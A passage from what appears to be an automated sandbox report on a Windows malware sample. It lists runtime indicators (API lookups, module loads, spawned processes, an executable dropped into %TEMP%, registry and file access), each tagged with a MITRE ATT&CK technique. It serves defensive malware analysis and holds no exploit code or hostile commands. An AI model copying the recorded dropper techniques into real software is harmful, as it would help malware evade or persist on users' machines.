\"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004792)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"14001500da592b77@api-ms-win-downlevel-advapi32-l1-1-0.dll\"\n \"130014008e5a2b77@api-ms-win-downlevel-advapi32-l1-1-0.dll\"\n \"15001600c03ea26b@ADVAPI32.dll\"\n \"0e000f00703fa26b@ADVAPI32.dll\"\n \"0e000f00cc3fa26b@ADVAPI32.dll\"\n \"11001200b447a26b@ADVAPI32.dll\"\n \"110012004848a26b@ADVAPI32.dll\"\n \"120013008c48a26b@ADVAPI32.dll\"\n \"12001300e448a26b@ADVAPI32.dll\"\n \"14001500386ea26b@ADVAPI32.dll\"\n \"14001500506ea26b@ADVAPI32.dll\"\n \"14001500686ea26b@ADVAPI32.dll\"\n \"17001800806ea26b@ADVAPI32.dll\"\n \"0d000e00986ea26b@ADVAPI32.dll\"\n \"11001200a86ea26b@ADVAPI32.dll\"\n \"11001200bc6ea26b@ADVAPI32.dll\"\n \"0d000e004466a26b@WININET.dll\"\n \"0d000e00b466a26b@WININET.dll\"\n \"10001100ec66a26b@WININET.dll\"\n \"100011009067a26b@WININET.dll\"\n \"10001100006fa26b@WININET.dll\"\n \"10001100146fa26b@WININET.dll\"\n \"14001500286fa26b@WININET.dll\"\n \"14001500406fa26b@WININET.dll\"\n \"12001300586fa26b@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"CreateProcessW\" with parameter \":*C:\\73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe *\" - (UID: 00000000-00002964)\n \"085cda53603755dc.exe\" called \"CreateProcessW\" with parameter \"a ZZZZZZXWSXG\" - (UID: 00000000-00002372)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"085cda53603755dc.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"\n \"085cda53603755dc.exe\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf\" has an executable section named \".text\"\n \"085cda53603755dc.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf\" has an writable section named \".data\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf\" has an writable section named \".bss\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf\" has an writable section named \".idata\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf\" has an writable section named \".CRT\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf\" has an writable section named \".tls\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf\" has an writable section named \".rsrc\"\n \"085cda53603755dc.exe\" has an writable section named \".data\"\n \"085cda53603755dc.exe\" has an writable section named \".bss\"\n \"085cda53603755dc.exe\" has an writable section named \".idata\"\n \"085cda53603755dc.exe\" has an writable section named \".CRT\"\n \"085cda53603755dc.exe\" has an writable section named \".tls\"\n \"085cda53603755dc.exe\" has an writable section named \".rsrc\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75400000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75400000\n \"085cda53603755dc.exe\" loaded module \"SECUR32.DLL\" at base 75280000\n \"085cda53603755dc.exe\" loaded module \"RPCRT4.DLL\" at base 777f0000\n \"085cda53603755dc.exe\" loaded module \"SHELL32.DLL\" at base 75c10000\n \"085cda53603755dc.exe\" loaded module \"PROFAPI.DLL\" at base 75560000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 70730000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75580000\n \"085cda53603755dc.exe\" loaded module \"WS2_32.DLL\" at base 769c0000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70b40000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"085cda53603755dc.exe\" loaded module \"KERNEL32\" at base 77470000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ce50000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 777F0000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 777F0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004792)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004792)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"085cda53603755dc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"085cda53603755dc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e6092 ...\" (UID: 00000000-00002372)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZXWSXG\" (UID: 00000000-00004792)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e6092 ...\" (UID: 00000000-00002372)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZXWSXG\" (UID: 00000000-00004792)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf\" was detected as \"MinGW\" and name: \"Compiler\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"\n \"085cda53603755dc.exe\" was detected as \"MinGW\" and name: \"Compiler\"\n \"085cda53603755dc.exe\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-481", "type": 2, "relevance": 1, "name": "Reference explorer.exe process", "description": "Found string \"explorer.exe\" (Indicator: \"explorer.exe\"; File: \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00002964]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\version.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FLTLIB.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Secur32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" reads file \"c:\\73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"085cda53603755dc.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" trying to touch file \"C:\\version.DLL\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\Documents\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ui\\SwDRM.dll\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" trying to touch file \"C:\\Windows\\System32\\sechost.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"085cda53603755dc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" writes file \"%temp%\\085cda53603755dc.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00002964]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n 